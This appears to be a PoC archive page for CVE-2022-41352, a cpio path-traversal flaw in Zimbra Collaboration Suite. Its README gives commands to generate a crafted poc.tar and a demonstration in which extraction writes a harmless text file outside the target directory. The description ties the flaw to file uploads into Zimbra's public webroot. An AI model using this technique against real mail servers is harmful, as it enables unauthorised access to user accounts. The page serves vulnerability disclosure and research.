Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-41352 PoC — Zimbra Collaboration Suite 路径遍历漏洞

Source
Associated Vulnerability
Title:Zimbra Collaboration Suite 路径遍历漏洞 (CVE-2022-41352)
Description:An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavis via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavis automatically prefers it over cpio.
Description
cve-2022-41352 poc
Readme
# cve-2022-41352

# generate poc.tar
```
$ chmod +x cpio_pocgen.py
$ ./cpio_pocgen.py
```

# show the middle finger to cpio
```
$ cd /tmp
$ mkdir -p poc/a/b

copy poc.tar to /tmp/poc/a/b/

$ cd /tmp/poc/a/b/
$ cpio -i < poc.tar
$ ls -al ../
total 16
drwxrwxr-x 3 xabino xabino 4096 ott 10 14:56 .
drwxrwxr-x 3 xabino xabino 4096 ott 10 14:55 ..
drwxrwxr-x 2 xabino xabino 4096 ott 10 14:56 b
-rw-r--r-- 1 xabino xabino   35 ott 10 14:56 here.txt <-- resource outside of /tmp/poc/a/b/

$ cat ../here.txt
I should not be here - by segfault
```
File Snapshot

[4.0K] /data/pocs/704119233d9f91ebe14ebca58f173a9c14be06f3 ├── [2.4K] cpio_pocgen.py ├── [ 18K] LICENSE ├── [2.5K] poc.tar └── [ 542] README.md 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →